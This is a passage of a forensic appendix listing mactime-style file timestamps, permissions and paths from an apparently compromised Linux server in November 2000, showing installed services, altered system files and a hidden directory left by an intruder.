                       2295 ..c -rwxr-xr-x root     root     /usr/lib/yp/pwupdate

                      10004 ..c -rwxr-xr-x root     root     /usr/lib/yp/revnetgroup

                      10884 ..c -rwxr-xr-x root     root     /usr/lib/yp/yphelper

                       4110 ..c -rwxr-xr-x root     root     /usr/lib/yp/ypinit

                      19272 ..c -rwxr-xr-x root     root     /usr/lib/yp/ypxfr

                        329 ..c -rwxr-xr-x root     root     /usr/lib/yp/ypxfr_1perday

                        246 ..c -rwxr-xr-x root     root     /usr/lib/yp/ypxfr_1perhour

                        260 ..c -rwxr-xr-x root     root     /usr/lib/yp/ypxfr_2perday

                     129824 ..c -rw-r--r-- root     root     /usr/man/man1/screen.1

                      32150 ..c -rw-r--r-- root     root     /usr/man/man1/telnet.1

                       1002 ..c -rw-r--r-- root     root     /usr/man/man5/issue.net.5

                       1914 ..c -rw-r--r-- root     root     /usr/man/man5/netgroup.5

                       2739 ..c -rw-r--r-- root     root     /usr/man/man5/ypserv.conf.5

                      12823 ..c -rw-r--r-- root     root     /usr/man/man8/in.telnetd.8

                       2112 ..c -rw-r--r-- root     root     /usr/man/man8/makedbm.8

                       2492 ..c -rw-r--r-- root     root     /usr/man/man8/mknetid.8

                        678 ..c -rw-r--r-- root     root     /usr/man/man8/pwupdate.8

                        592 ..c -rw-r--r-- root     root     /usr/man/man8/revnetgroup.8

                       6962 ..c -rw-r--r-- root     root     /usr/man/man8/rpc.yppasswdd.8

                       4004 ..c -rw-r--r-- root     root     /usr/man/man8/rpc.ypxfrd.8

                         12 mac lrwxrwxrwx root     root     /usr/man/man8/telnetd.8 -> in.telnetd.8

                       1593 ..c -rw-r--r-- root     root     /usr/man/man8/ypinit.8

                         25 ..c -rw-r--r-- root     root     /usr/man/man8/yppasswdd.8

                       2830 ..c -rw-r--r-- root     root     /usr/man/man8/yppush.8

                       4886 ..c -rw-r--r-- root     root     /usr/man/man8/ypserv.8

                       4320 ..c -rw-r--r-- root     root     /usr/man/man8/ypxfr.8

                         22 ..c -rw-r--r-- root     root     /usr/man/man8/ypxfrd.8

                      35628 ..c -rwxr-xr-x root     root     /usr/sbin/in.telnetd

                      18448 ..c -rwxr-xr-x root     root     /usr/sbin/rpc.yppasswdd

                      25212 ..c -rwxr-xr-x root     root     /usr/sbin/rpc.ypxfrd

                      14520 ..c -rwxr-xr-x root     root     /usr/sbin/yppush

                      40476 ..c -rwxr-xr-x root     root     /usr/sbin/ypserv

                       1024 m.c drwxr-xr-x root     root     /var/yp

                      13843 ..c -rw-r--r-- root     root     /var/yp/Makefile

                        471 ..c -rw-r--r-- root     root     /var/yp/securenets

Nov 08 00 06:52:34  1052024 m.c -rwxr-xr-x root     root     /bin/bx

Nov 08 00 06:53:06     1024 m.c drwxr-x--- root     root     /root

                      12288 m.c -rw-rw-r-- root     root     /etc/psdevtab

                       1024 m.c drwxr-xr-x root     root     /root/.ssh

                        537 m.c -rw------- root     root     /etc/ssh_host_key

                        341 mac -rw-r--r-- root     root     /etc/ssh_host_key.pub

                        512 m.c -rw------- root     root     /root/.ssh/random_seed

Nov 08 00 06:53:11      880 m.c -rw-r--r-- root     root     /etc/ssh_config

                          3 mac lrwxrwxrwx root     root     /usr/local/bin/slogin -> ssh

                          4 mac lrwxrwxrwx root     root     /usr/local/bin/ssh -> ssh1

                         11 mac lrwxrwxrwx root     root     /usr/local/bin/ssh-keygen -> ssh-keygen1

                     327262 mac -rwxr-xr-x root     root     /usr/local/bin/ssh-keygen1

                     604938 mac -rws--x--x root     root     /usr/local/bin/ssh1

Nov 08 00 06:53:12       21 mac lrwxrwxrwx root     root     /usr/local/bin/make-ssh-known-hosts -> make-ssh-known-hosts1

                      21228 mac -rwxr-xr-x root     root     /usr/local/bin/make-ssh-known-hosts1

                          4 mac lrwxrwxrwx root     root     /usr/local/bin/scp -> scp1

                      90424 mac -rwxr-xr-x root     root     /usr/local/bin/scp1

                          8 mac lrwxrwxrwx root     root     /usr/local/bin/ssh-add -> ssh-add1

                     337617 mac -rwxr-xr-x root     root     /usr/local/bin/ssh-add1

                         10 mac lrwxrwxrwx root     root     /usr/local/bin/ssh-agent -> ssh-agent1

                     343586 mac -rwxr-xr-x root     root     /usr/local/bin/ssh-agent1

                          5 m.c lrwxrwxrwx root     root     /usr/local/sbin/sshd -> sshd1

                     643674 m.c -rwxr-xr-x root     root     /usr/local/sbin/sshd1

                        955 m.c -rwxr-xr-x root     root     /etc/rc.d/rc.local

                        684 m.c -rw-r--r-- root     root     /etc/sshd_config

                       4096 m.c drwxr-xr-x root     root     /usr/local/man/man1

                         23 mac lrwxrwxrwx root     root     /usr/local/man/man1/make-ssh-known-hosts.1 -> make-ssh-known-hosts1.1

                      12272 mac -rw-r--r-- root     root     /usr/local/man/man1/make-ssh-known-hosts1.1

                          6 mac lrwxrwxrwx root     root     /usr/local/man/man1/scp.1 -> scp1.1

                       4892 mac -rw-r--r-- root     root     /usr/local/man/man1/scp1.1

                          5 mac lrwxrwxrwx root     root     /usr/local/man/man1/slogin.1 -> ssh.1

                          6 mac lrwxrwxrwx root     root     /usr/local/man/man1/slogin1.1 -> ssh1.1

                         10 mac lrwxrwxrwx root     root     /usr/local/man/man1/ssh-add.1 -> ssh-add1.1

                       4007 mac -rw-r--r-- root     root     /usr/local/man/man1/ssh-add1.1

                         12 mac lrwxrwxrwx root     root     /usr/local/man/man1/ssh-agent.1 -> ssh-agent1.1

                       6265 mac -rw-r--r-- root     root     /usr/local/man/man1/ssh-agent1.1

                         13 mac lrwxrwxrwx root     root     /usr/local/man/man1/ssh-keygen.1 -> ssh-keygen1.1

                       5824 mac -rw-r--r-- root     root     /usr/local/man/man1/ssh-keygen1.1

                          6 mac lrwxrwxrwx root     root     /usr/local/man/man1/ssh.1 -> ssh1.1

                      38572 mac -rw-r--r-- root     root     /usr/local/man/man1/ssh1.1

                       4096 m.c drwxr-xr-x root     root     /usr/local/man/man8

                          7 mac lrwxrwxrwx root     root     /usr/local/man/man8/sshd.8 -> sshd1.8

                      37023 mac -rw-r--r-- root     root     /usr/local/man/man8/sshd1.8

                          5 mac -rw-r--r-- root     root     /var/run/sshd.pid

Nov 08 00 06:53:40      484 ..c -rw------- root     root     /etc/ftpaccess

                        456 ..c -rw------- root     root     /etc/ftpconversions

                         39 ..c -rw------- root     root     /etc/ftpgroups

                        104 ..c -rw------- root     root     /etc/ftphosts

                         79 ..c -rw------- root     root     /etc/ftpusers

                       1024 m.c drwxr-xr-x root     root     /etc/logrotate.d

                         78 ..c -rw-r--r-- root     root     /etc/logrotate.d/ftpd

                       1024 m.c drwxr-xr-x root     root     /etc/pam.d

                        314 ..c -rw-r--r-- root     root     /etc/pam.d/ftp

                      16384 m.c drwxr-xr-x root     root     /usr/bin

                       8928 ..c -rwxr-xr-x bin      bin      /usr/bin/ftpcount

                       8928 ..c -rwxr-xr-x bin      bin      /usr/bin/ftpwho

                       4096 m.c drwxr-xr-x root     root     /usr/doc/wu-ftpd-2.6.0

                     112149 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/CHANGES

                      11382 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/CONTRIBUTORS

                       2580 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/ERRATA

                       4096 m.c drwxr-xr-x root     root     /usr/doc/wu-ftpd-2.6.0/HOWTO

                      28539 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/HOWTO/VIRTUAL.FTP.SUPPORT

                      18641 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/HOWTO/upload.configuration.HOWTO

                       3185 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/README

                       4396 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/TODO

                       4096 m.c drwxr-xr-x root     root     /usr/doc/wu-ftpd-2.6.0/examples

                        404 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/examples/ftpaccess

                       1866 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/examples/ftpaccess.heavy

                        538 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/examples/ftpconversions

                        137 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/examples/ftpconversions.solaris

                         37 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/examples/ftpgroups

                        190 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/examples/ftphosts

                        882 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/examples/ftpservers

                         83 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/examples/ftpusers

                      16384 m.c drwxr-xr-x root     root     /usr/man/man1

                        701 ..c -rw-r--r-- root     root     /usr/man/man1/ftpcount.1.gz

                        702 ..c -rw-r--r-- root     root     /usr/man/man1/ftpwho.1.gz

                      14006 ..c -rw-r--r-- root     root     /usr/man/man5/ftpaccess.5.gz

                        857 ..c -rw-r--r-- root     root     /usr/man/man5/ftpconversions.5.gz

                        815 ..c -rw-r--r-- root     root     /usr/man/man5/ftphosts.5.gz

                       1635 ..c -rw-r--r-- root     root     /usr/man/man5/ftpservers.5.gz

                       1490 ..c -rw-r--r-- root     root     /usr/man/man5/xferlog.5.gz

                       5272 ..c -rw-r--r-- root     root     /usr/man/man8/ftpd.8.gz

                        846 ..c -rw-r--r-- root     root     /usr/man/man8/ftprestart.8.gz

                       1583 ..c -rw-r--r-- root     root     /usr/man/man8/ftpshut.8.gz

                       1350 ..c -rw-r--r-- root     root     /usr/man/man8/privatepw.8.gz

                       7792 ..c -rwxr-xr-x bin      bin      /usr/sbin/ckconfig

                       8112 ..c -rwxr-xr-x bin      bin      /usr/sbin/ftprestart

                      10800 ..c -rwxr-xr-x bin      bin      /usr/sbin/ftpshut

                     162608 ..c -rwxr-xr-x bin      bin      /usr/sbin/in.ftpd

                          7 .ac lrwxrwxrwx bin      bin      /usr/sbin/in.wuftpd -> in.ftpd

                      10448 ..c -rwxr-xr-x bin      bin      /usr/sbin/privatepw

                          7 .ac lrwxrwxrwx bin      bin      /usr/sbin/wu.ftpd -> in.ftpd

                      10438 ..c -rwxr-xr-x bin      bin      /usr/sbin/xferstats

Nov 08 00 06:53:49     1024 m.c drwxr-xr-x root     root     /etc/rc.d/init.d

                       2257 .ac -rwxr-xr-x root     root     /etc/rc.d/init.d/nfs

                       1722 ..c -rwxr-xr-x root     root     /etc/rc.d/init.d/nfslock

                       3072 m.c drwxr-xr-x root     root     /sbin

                       2848 ..c -rwxr-xr-x root     root     /sbin/rpc.lockd

                      19888 ..c -rwxr-xr-x root     root     /sbin/rpc.statd

                       6960 ..c -rwxr-xr-x root     root     /sbin/rpcdebug

                       4096 m.c drwxr-xr-x root     root     /usr/doc

                       4096 m.c drwxr-xr-x root     root     /usr/doc/nfs-utils-0.1.9.1

                       2397 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/ChangeLog

                        563 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/INSTALL

                       1058 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/KNOWNBUGS

                      10337 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/NEW

                       2305 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/README

                        291 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/THANKS

                       4517 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/TODO

                       3882 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/index.html

                       3882 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/nfs.html

                     186037 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/nfs.ps

                       2626 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node1.html

                       3254 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node10.html

                       4615 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node11.html

                       3479 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node12.html

                       2432 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node13.html

                       6807 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node14.html

                       7418 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node15.html

                       8743 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node16.html

                       2064 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node17.html

                       2786 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node18.html

                       2165 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node19.html

                       2399 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node2.html

                       1989 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node20.html

                       2291 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node21.html

                      13506 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node22.html

                      13490 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node23.html

                      15226 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node24.html

                       2377 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node25.html

                      15230 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node26.html

                       2377 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node27.html

                       2903 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node3.html

                       3966 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node4.html

                       2623 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node5.html

                       4444 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node6.html

                       4157 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node7.html

                       3989 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node8.html

                       2756 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node9.html

                       4096 m.c drwxr-xr-x root     root     /usr/man/man5

                       6244 ..c -rw-r--r-- root     root     /usr/man/man5/exports.5.gz

                      12288 m.c drwxr-xr-x root     root     /usr/man/man8

                       2224 ..c -rw-r--r-- root     root     /usr/man/man8/exportfs.8.gz

                        376 ..c -rw-r--r-- root     root     /usr/man/man8/lockd.8.gz

                       1246 ..c -rw-r--r-- root     root     /usr/man/man8/mountd.8.gz

                        702 ..c -rw-r--r-- root     root     /usr/man/man8/nfsd.8.gz

                        788 ..c -rw-r--r-- root     root     /usr/man/man8/nfsstat.8.gz

                        341 ..c -rw-r--r-- root     root     /usr/man/man8/nhfsgraph.8.gz

                        332 ..c -rw-r--r-- root     root     /usr/man/man8/nhfsnums.8.gz

                        235 ..c -rw-r--r-- root     root     /usr/man/man8/nhfsrun.8.gz

                       4030 ..c -rw-r--r-- root     root     /usr/man/man8/nhfsstone.8.gz

                         10 mac lrwxrwxrwx root     root     /usr/man/man8/rpc.lockd.8.gz -> lockd.8.gz

                         11 .ac lrwxrwxrwx root     root     /usr/man/man8/rpc.mountd.8.gz -> mountd.8.gz

                          9 .ac lrwxrwxrwx root     root     /usr/man/man8/rpc.nfsd.8.gz -> nfsd.8.gz

                         12 .ac lrwxrwxrwx root     root     /usr/man/man8/rpc.rquotad.8.gz -> rquotad.8.gz

                         10 .ac lrwxrwxrwx root     root     /usr/man/man8/rpc.statd.8.gz -> statd.8.gz

                        476 ..c -rw-r--r-- root     root     /usr/man/man8/rquotad.8.gz

                        805 ..c -rw-r--r-- root     root     /usr/man/man8/showmount.8.gz

                        718 ..c -rw-r--r-- root     root     /usr/man/man8/statd.8.gz

                      25232 ..c -rwxr-xr-x root     root     /usr/sbin/exportfs

                       6352 ..c -rwxr-xr-x root     root     /usr/sbin/nfsstat

                      18640 ..c -rwxr-xr-x root     root     /usr/sbin/nhfsstone

                      36784 ..c -rwxr-xr-x root     root     /usr/sbin/rpc.mountd

                       3368 ..c -rwxr-xr-x root     root     /usr/sbin/rpc.nfsd

                       9872 ..c -rwxr-xr-x root     root     /usr/sbin/rpc.rquotad

                       9104 ..c -rwxr-xr-x root     root     /usr/sbin/showmount

                       1024 m.c drwxr-xr-x root     root     /var/lib/nfs

                          0 ..c -rw-r--r-- root     root     /var/lib/nfs/etab

                          0 ..c -rw-r--r-- root     root     /var/lib/nfs/rmtab

                          0 ..c -rw-r--r-- root     root     /var/lib/nfs/xtab

                      16384 m.c -rw-r--r-- root     root     /var/lib/rpm/conflictsindex.rpm

                    1343488 mac -rw-r--r-- root     root     /var/lib/rpm/fileindex.rpm

                      16384 m.c -rw-r--r-- root     root     /var/lib/rpm/groupindex.rpm

                      16384 m.c -rw-r--r-- root     root     /var/lib/rpm/nameindex.rpm

                    4173832 mac -rw-r--r-- root     root     /var/lib/rpm/packages.rpm

                      49152 m.c -rw-r--r-- root     root     /var/lib/rpm/providesindex.rpm

                      49152 m.c -rw-r--r-- root     root     /var/lib/rpm/requiredby.rpm

                      16384 m.c -rw-r--r-- root     root     /var/lib/rpm/triggerindex.rpm

                          4 mac -rw------- root     root     /var/lib/nfs/state

                          0 mac -rw-r--r-- root     root     /var/lock/subsys/nfslock

Nov 08 00 06:54:22     6416 mac -rwxr-xr-x root     root     /usr/local/bin/addr

Nov 08 00 06:54:23   271188 ..c -rwxr-xr-x root     root     /usr/local/bin/dig

                     241744 mac -rwxr-xr-x root     root     /usr/local/bin/dnsquery

                     260816 mac -rwxr-xr-x root     root     /usr/local/bin/host

                       4096 m.c drwxr-xr-x root     root     /usr/local/bin

                       3296 mac -rwxr-xr-x root     root     /usr/local/bin/mkservdb

                     241792 mac -rwxr-xr-x root     root     /usr/local/bin/nsupdate

                       4096 m.c drwxr-xr-x root     root     /usr/local/sbin

                     263960 m.c -rwxr-xr-x root     root     /usr/local/sbin/irpd

                     525412 m.c -rwxr-xr-x root     root     /usr/local/sbin/named

                       7166 mac -rwxr-xr-x root     root     /usr/local/sbin/named-bootconf

                      36960 mac -rwxr-xr-x root     root     /usr/local/sbin/ndc

                       4096 m.c drwxr-xr-x root     root     /usr/sbin

                     525412 mac -rwxr-xr-x root     root     /usr/sbin/named

                       1024 m.c drwxr-xr-x root     root     /var/run

                          5 mac -rw-r--r-- root     root     /var/run/named.pid

                          0 mac -rw------- root     root     /var/run/ndc

Nov 08 00 06:55:30     4096 m.c drwxr-xr-x root     root     /usr/libexec/awk

Nov 08 00 06:55:51       78 m.c -rw-r--r-- root     root     /usr/libexec/awk/addy.awk

Nov 08 00 06:55:58      657 m.c -rw-r--r-- root     root     /etc/passwd

                        601 m.c -rw-r--r-- root     root     /etc/shadow

Nov 08 00 06:56:02     1024 m.c drwxr-xr-x root     root     /var/log

                       7974 mac -rw-r--r-- root     root     /var/log/messages

                        268 mac -rw-r--r-- root     root     /var/log/secure

                          0 mac -rw-r--r-- root     root     /var/log/xferlog

Nov 08 00 06:56:08     4096 m.c drwxr-xr-x 1010     users    /usr/man/.Ci

Nov 08 00 06:56:59    17968 ..c -rwx------ root     root     /bin/ping

                      45388 ..c -rwx------ root     tty      /sbin/dump

                      67788 ..c -rwx------ root     tty      /sbin/restore

                      33288 ..c -rwx------ root     root     /usr/bin/at

                      35168 ..c -rwx------ root     root     /usr/bin/chage

                      36756 ..c -rwx------ root     root     /usr/bin/gpasswd

                       5640 ..c -rwx------ root     root     /usr/bin/newgrp

                     531516 ..c -rwx------ root     root     /usr/bin/sperl5.00503

                     531516 ..c -rwx------ root     root     /usr/bin/suidperl

                      34751 ..c -rwx------ root     root     /usr/libexec/pt_chown

                      16488 ..c -rwx------ root     bin      /usr/sbin/traceroute

                       5896 ..c -rwx------ root     root     /usr/sbin/usernetctl

                       1024 m.c drwxrwxrwx root     root     /tmp

Nov 08 00 06:59:07     4096 m.c drwx------ drosen   drosen   /home/drosen

                         52 mac -rw------- drosen   drosen   /home/drosen/.bash_history

                      34816 m.c drwxr-xr-x root     root     /dev

                       1024 m.c drwxrwxrwx root     root     /var/tmp

                        184 mac -rw-r--r-- root     root     /var/tmp/nap

Nov 08 00 07:03:05     3027 m.c -rw-r--r-- root     root     /etc/inetd.conf

                        512 m.c -rw------- root     root     /etc/ssh_random_seed

                          0 ..c crw--w---- root     tty      /dev/vcs1

                          0 ..c crw--w---- root     tty      /dev/vcsa1

                    1460292 mac -rw-r--r-- root     root     /var/log/lastlog

                        768 m.c -rw-r--r-- root     root     /var/log/wtmp

                       4992 m.c -rw-rw-r-- root     utmp     /var/run/utmp

Nov 08 00 18:37:38        0 m.c crw------- root     tty      /dev/tty1

                       3072 m.c drwxr-xr-x root     root     /etc

                        248 mac -rw-r--r-- root     root     /etc/mtab

Nov 08 00 20:10:01    31607 m.c -rw------- root     root     /var/log/cron

 

 

 

 

 

 

 

 

APPENDIX B: FILES ACCESSED TIMES

 

Nov 06 00 01:00:41     4096 mac -rw-r--r-- root     root     /var/run/ftp.pids-all

Nov 06 00 02:02:00     1024 m.c drwxr-xr-x root     root     /var/lib

                       1024 m.c drwxr-xr-x root     root     /var/spool/anacron

                          9 .a. -rw------- root     root     /var/spool/anacron/cron.daily

Nov 06 00 02:02:03     4096 m.c drwxr-xr-x root     root     /usr/X11R6/man

                       4096 m.c drwxr-xr-x root     root     /usr/lib/perl5/man

                       4096 m.c drwxr-xr-x root     root     /usr/local/man

Nov 08 00 02:02:00      370 .a. -rw-r--r-- root     root     /etc/anacrontab

                        276 .a. -rwxr-xr-x root     root     /etc/cron.daily/0anacron

                         77 .a. -rwxr-xr-x root     root     /etc/cron.daily/inn-cron-expire

                         53 .a. -rwxr-xr-x root     root     /etc/cron.daily/inn-cron-rnews

                         51 .a. -rwxr-xr-x root     root     /etc/cron.daily/logrotate

                        542 .a. -rw-r--r-- root     root     /etc/logrotate.conf

                        494 .a. -rw-r--r-- root     root     /etc/logrotate.d/apache

                        122 .a. -rw-r--r-- root     root     /etc/logrotate.d/cron

                        145 .a. -rw-r--r-- root     root     /etc/logrotate.d/linuxconf

                        114 .a. -rw-r--r-- root     root     /etc/logrotate.d/mars-nwe.log

                        102 .a. -rw-r--r-- root     root     /etc/logrotate.d/named

                        227 .a. -rw-r--r-- root     root     /etc/logrotate.d/samba

                        410 .a. -rw-r--r-- root     root     /etc/logrotate.d/syslog

                        544 .a. -rw-r--r-- root     root     /etc/logrotate.d/uucp

                      19568 .a. -rwxr-xr-x root     root     /usr/sbin/anacron

                      30000 .a. -rwxr-xr-x root     root     /usr/sbin/logrotate

                        464 mac -rw-r--r-- root     root     /var/lib/logrotate.status

                          9 m.c -rw------- root     root     /var/spool/anacron/cron.daily

Nov 08 00 02:02:01     3397 .a. -rw-r--r-- root     root     /etc/man.config

                      36192 .a. -rwxr-Sr-x root     man      /usr/bin/man

Nov 08 00 02:02:02     6796 .a. -rwxr-xr-x root     root     /bin/rmdir

                      27632 .a. -rwxr-xr-x root     root     /bin/sort

                       1024 .a. drwxr-xr-x root     root     /boot

                      12288 .a. drwxr-xr-x root     root     /boot/lost+found

                        402 .a. -rwxr-xr-x root     root     /etc/cron.daily/makewhatis.cron

                       4096 .a. drwxr-xr-x root     root     /home

                       4096 .a. drwxr-xr-x root     root     /home/ftp

                       4096 .a. d--x--x--x root     root     /home/ftp/bin

                       4096 .a. d--x--x--x root     root     /home/ftp/etc

                       4096 .a. drwxr-xr-x root     root     /home/ftp/lib

                       4096 .a. drwxr-Sr-x root     ftp      /home/ftp/pub

                       4096 .a. drwxr-xr-x root     root     /home/httpd

                       4096 .a. drwxr-xr-x root     root     /home/httpd/cgi-bin

                       4096 .a. drwxr-xr-x root     root     /home/httpd/html

                       4096 .a. drwxr-xr-x root     root     /home/httpd/html/manual

                       4096 .a. drwxr-xr-x root     root     /home/httpd/html/manual/mod

                      16384 .a. drwxr-xr-x root     root     /home/lost+found

                      12288 .a. drwxr-xr-x root     root     /lost+found

                          0 mac -rw-r--r-- root     root     /usr/X11R6/man/whatis

                      54544 .a. -rwxr-xr-x root     root     /usr/bin/find

                      24272 .a. -rwxr-Sr-x root     slocate  /usr/bin/slocate

                      11392 .a. -rwxr-xr-x root     root     /usr/bin/uniq

                          0 mac -rw-r--r-- root     root     /usr/lib/perl5/man/whatis

                          0 mac -rw-r--r-- root     root     /usr/local/man/whatis

                          0 mac -rw-r--r-- root     root     /usr/man/whatis

                      10528 .a. -rwxr-xr-- root     root     /usr/sbin/makewhatis

                     238767 .a. -rw-r----- root     slocate  /var/lib/slocate/slocate.db

                       1024 m.c drwxrwxr-x root     uucp     /var/lock

Nov 08 00 02:02:03     4096 .a. drwx------ drosen   drosen   /home/drosen

                       4096 .a. drwxr-xr-x root     root     /home/httpd/icons

                       4096 .a. drwxr-xr-x root     root     /home/httpd/icons/small

                       4096 .a. drwxr-xr-x root     root     /usr

                       4096 .a. drwxr-xr-x root     root     /usr/doc

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ElectricFence-2.1

                       4096 .a. drwxr-xr-x root     root     /usr/doc/HTML

                       4096 .a. drwxr-xr-x root     root     /usr/doc/HTML/img

                       4096 .a. drwxr-xr-x root     root     /usr/doc/SysVinit-2.78

                       4096 .a. drwxr-xr-x root     root     /usr/doc/XFree86-xfs-3.3.6

                       4096 .a. drwxr-xr-x root     root     /usr/doc/anacron-2.1

                       4096 .a. drwxr-xr-x root     root     /usr/doc/apmd-3.0final

                       4096 .a. drwxr-xr-x root     root     /usr/doc/arpwatch-2.1a4

                       4096 .a. drwxr-xr-x root     root     /usr/doc/at-3.1.7

                       4096 .a. drwxr-xr-x root     root     /usr/doc/automake-1.4

                       4096 .a. drwxr-xr-x root     root     /usr/doc/bash-1.14.7

                       4096 .a. drwxr-xr-x root     root     /usr/doc/bash2-2.03

                       4096 .a. drwxr-xr-x root     root     /usr/doc/bind-8.2.2_P5

                       4096 .a. drwxr-xr-x root     root     /usr/doc/bind-8.2.2_P5/bog

                       4096 .a. drwxr-xr-x root     root     /usr/doc/bind-8.2.2_P5/html

                       4096 .a. drwxr-xr-x root     root     /usr/doc/bind-8.2.2_P5/misc

                       4096 .a. drwxr-xr-x root     root     /usr/doc/bind-8.2.2_P5/notes

                       4096 .a. drwxr-xr-x root     root     /usr/doc/bind-8.2.2_P5/rfc

                       4096 .a. drwxr-xr-x root     root     /usr/doc/bind-8.2.2_P5/tmac

                       4096 .a. drwxr-xr-x root     root     /usr/doc/binutils-2.9.5.0.22

                       4096 .a. drwxr-xr-x root     root     /usr/doc/bzip2-0.9.5d

                       4096 .a. drwxr-xr-x root     root     /usr/doc/caching-nameserver-6.2

                       4096 .a. drwxr-xr-x root     root     /usr/doc/console-tools-19990829

                       4096 .a. drwxr-xr-x root     root     /usr/doc/console-tools-19990829/contrib

                       4096 .a. drwxr-xr-x root     root     /usr/doc/console-tools-19990829/dvorak

                       4096 .a. drwxr-xr-x root     root     /usr/doc/console-tools-19990829/file-formats

                       4096 .a. drwxr-xr-x root     root     /usr/doc/console-tools-19990829/fonts

                       4096 .a. drwxr-xr-x root     root     /usr/doc/console-tools-19990829/keymaps

                       4096 .a. drwxr-xr-x root     root     /usr/doc/cpio-2.4.2

                       4096 .a. drwxr-xr-x root     root     /usr/doc/cproto-4.6

                       4096 .a. drwxr-xr-x root     root     /usr/doc/cracklib-2.7

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ctags-3.4

                       4096 .a. drwxr-xr-x root     root     /usr/doc/cvs-1.10.7

                       4096 .a. drwxr-xr-x root     root     /usr/doc/dev86-0.15.0

                       4096 .a. drwxr-xr-x root     root     /usr/doc/diffutils-2.7

                       4096 .a. drwxr-xr-x root     root     /usr/doc/dump-0.4b15

                       4096 .a. drwxr-xr-x root     root     /usr/doc/e2fsprogs-1.18

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ed-0.2

                       4096 .a. drwxr-xr-x root     root     /usr/doc/egcs-1.1.2

                       4096 .a. drwxr-xr-x root     root     /usr/doc/eject-2.0.2

                       4096 .a. drwxr-xr-x root     root     /usr/doc/emacs-20.5

                       4096 .a. drwxr-xr-x root     root     /usr/doc/fetchmail-5.3.1

                       4096 .a. drwxr-xr-x root     root     /usr/doc/fileutils-4.0

                       4096 .a. drwxr-xr-x root     root     /usr/doc/findutils-4.1

                       4096 .a. drwxr-xr-x root     root     /usr/doc/flex-2.5.4a

                       4096 .a. drwxr-xr-x root     root     /usr/doc/freetype-1.3.1

                       4096 .a. drwxr-xr-x root     root     /usr/doc/freetype-1.3.1/docs

                       4096 .a. drwxr-xr-x root     root     /usr/doc/freetype-1.3.1/docs/image

                       4096 .a. drwxr-xr-x root     root     /usr/doc/fwhois-1.00

                       4096 .a. drwxr-xr-x root     root     /usr/doc/gawk-3.0.4

                       4096 .a. drwxr-xr-x root     root     /usr/doc/gawk-3.0.4/README_d

                       4096 .a. drwxr-xr-x root     root     /usr/doc/gd-1.3

                       4096 .a. drwxr-xr-x root     root     /usr/doc/getty_ps-2.0.7j

                       4096 .a. drwxr-xr-x root     root     /usr/doc/getty_ps-2.0.7j/Examples

                       4096 .a. drwxr-xr-x root     root     /usr/doc/getty_ps-2.0.7j/Examples/default

                       4096 .a. drwxr-xr-x root     root     /usr/doc/ghostscript-5.50

                       4096 .a. drwxr-xr-x root     root     /usr/doc/git-4.3.19

